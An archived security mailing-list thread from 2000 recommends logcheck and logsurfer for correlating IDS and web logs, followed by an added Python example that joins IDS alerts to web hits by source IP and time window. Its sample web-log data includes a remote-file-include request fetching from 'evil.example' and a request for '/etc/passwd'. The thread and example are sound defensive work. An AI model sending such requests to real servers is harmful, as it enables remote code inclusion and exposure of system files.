Logcheck will tail multiple logfiles with some pattern matching
<ftp://ftp.cert.dfn.de/pub/tools/audit/logcheck/logcheck-1.01.tar.gz>

Logsurfer - will only do one file at a time but with multiple contexts
(a context can be opened on a regexp match & continue collecting lines
until a timeout, or report line X only if line Y doesn't get logged
within a timeout)
<http://www.cert.dfn.de/eng/logsurf/>

--
Rafi Sadowsky                         rafiat_private
Network/System/Security               VoiceMail: +972-3-646-0592  FAX: +972-3-646-5410
Mangler ( :-)             | member ILAN-CERT(CERTat_private)
Open University of Israel | (PGP key -> ) http://telem.openu.ac.il/~rafi

On Tue, 11 Jan 2000, Pete Storm wrote:

> Hi all,
>
> Does anyone know of a tool out there that will allow
> me to correlate incidents between several different
> logs? For example, if I see an attempt to pull off a
> php exploit on my IDS it stands to reason that I'll
> see a similar log entry on my web server. What I'm
> looking for is something that will pull these two
> records out of the individual logs and place them in
> an "incident" log as a related event.
>
> The current problem is that we're talking about
> hundreds of thousands of log entries. Suppose I could
> Perl it, but I was kinda hoping there might be a
> commercial/shareware tool out there already that could
> do it so much better than I could.
>
> thanks,
> phs
>
> __________________________________________________
> Do You Yahoo!?
> Talk to your friends online with Yahoo! Messenger.
> http://im.yahoo.com
>
>
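The "I could Perl it" approach Pete mentions, as an added example that is not part of either message and not code from logcheck or logsurfer (written in Python rather than Perl so it runs as-is): pair each IDS alert with web-server hits from the same source IP inside a time window and emit the pair as one incident record, and separately report alerts that get no corroborating web line within the window, which is the logsurfer-style "report line X only if line Y doesn't get logged within a timeout" case. The log formats (Snort-style fast alert lines and Apache common-log lines), the sample lines, the log year and the shared time zone are all assumptions made for the example.

```python
import re
import bisect
from datetime import datetime, timedelta

# Constructed sample input (not real traffic). Assumed formats: Snort-style
# "fast" alert lines for the IDS and Apache common-log lines for the web
# server; both assumed to be in the same local time zone and year.
IDS_LOG = """\
01/11-10:15:02.123456 [**] WEB-PHP remote file include attempt [**] 10.1.1.5:33412 -> 192.168.1.10:80
01/11-10:15:40.500000 [**] WEB-PHP remote file include attempt [**] 10.1.1.9:41000 -> 192.168.1.10:80
01/11-10:20:00.000000 [**] ICMP PING NMAP [**] 10.1.1.7 -> 192.168.1.10
"""
WEB_LOG = """\
10.1.1.5 - - [11/Jan/2000:10:15:03 +0200] "GET /index.php?page=http://evil.example/x.txt HTTP/1.0" 200 512
10.1.1.12 - - [11/Jan/2000:10:15:10 +0200] "GET /about.html HTTP/1.0" 200 1024
10.1.1.9 - - [11/Jan/2000:10:17:55 +0200] "GET /index.php?page=/etc/passwd HTTP/1.0" 404 230
"""
LOG_YEAR = 2000  # assumption: Snort fast alerts carry no year

IDS_RE = re.compile(
    r"^(?P<mon>\d\d)/(?P<day>\d\d)-(?P<hms>\d\d:\d\d:\d\d)\.\d+ "
    r"\[\*\*\] (?P<sig>.+?) \[\*\*\] "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)(?::\d+)? -> (?P<dst>\d+\.\d+\.\d+\.\d+)(?::\d+)?$")
WEB_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+$')


def parse_ids(text):
    """Yield one dict per alert line; lines that do not match are skipped."""
    for line in text.splitlines():
        m = IDS_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{LOG_YEAR}/{m['mon']}/{m['day']} {m['hms']}",
                               "%Y/%m/%d %H:%M:%S")  # sub-second part dropped
        yield {"ts": ts, "src": m["src"], "dst": m["dst"], "sig": m["sig"], "raw": line}


def parse_web(text):
    """Yield one dict per access-log line; lines that do not match are skipped."""
    for line in text.splitlines():
        m = WEB_RE.match(line)
        if not m:
            continue
        # strptime yields an aware datetime; drop the offset so it compares
        # with the naive IDS timestamps (same zone assumed).
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
        yield {"ts": ts, "src": m["src"], "req": m["req"],
               "status": int(m["status"]), "raw": line}


def index_by_source(entries):
    """Group entries by source IP and sort each group by time, so a window
    lookup is a bisect per alert rather than a scan over every web line."""
    groups = {}
    for e in entries:
        groups.setdefault(e["src"], []).append(e)
    for lst in groups.values():
        lst.sort(key=lambda e: e["ts"])
    return {src: ([e["ts"] for e in lst], lst) for src, lst in groups.items()}


def correlate(ids_text, web_text, window_seconds=60):
    """Return (incidents, unconfirmed): alerts corroborated by at least one
    web line from the same source IP within +/- window_seconds, and alerts
    for which no such line showed up inside the window."""
    window = timedelta(seconds=window_seconds)
    web_idx = index_by_source(parse_web(web_text))
    incidents, unconfirmed = [], []
    for alert in parse_ids(ids_text):
        times, entries = web_idx.get(alert["src"], ([], []))
        lo = bisect.bisect_left(times, alert["ts"] - window)
        hi = bisect.bisect_right(times, alert["ts"] + window)
        if lo < hi:
            incidents.append({"alert": alert, "web": entries[lo:hi]})
        else:
            unconfirmed.append(alert)
    return incidents, unconfirmed


def format_incident(inc):
    """Render one correlated incident as the lines written to the incident log."""
    a = inc["alert"]
    lines = [f"INCIDENT {a['ts']:%Y-%m-%d %H:%M:%S} src={a['src']} sig={a['sig']!r}",
             f"  IDS: {a['raw']}"]
    lines += [f"  WEB: {w['raw']}" for w in inc["web"]]
    return "\n".join(lines)


if __name__ == "__main__":
    incidents, unconfirmed = correlate(IDS_LOG, WEB_LOG)
    for inc in incidents:
        print(format_incident(inc))
    for a in unconfirmed:
        print(f"UNCONFIRMED {a['ts']:%Y-%m-%d %H:%M:%S} src={a['src']} sig={a['sig']!r}")
```

With the sample lines and the default 60-second window the 10.1.1.5 alert is written out as an incident together with its web hit, while the 10.1.1.9 alert (web hit 135 seconds later) and the ICMP alert (no web line at all) are reported as unconfirmed; widening the window to 300 seconds pulls the 10.1.1.9 pair into the incident log. Grouping per source and bisecting keeps the run at one sort plus a log-time lookup per alert, which is what matters at hundreds of thousands of lines. The join key is only the source IP, so hosts behind the same NAT or proxy collapse into one source, and the IDS and web-server clocks must be in step or the window has to absorb the skew.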
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:57:35 PDT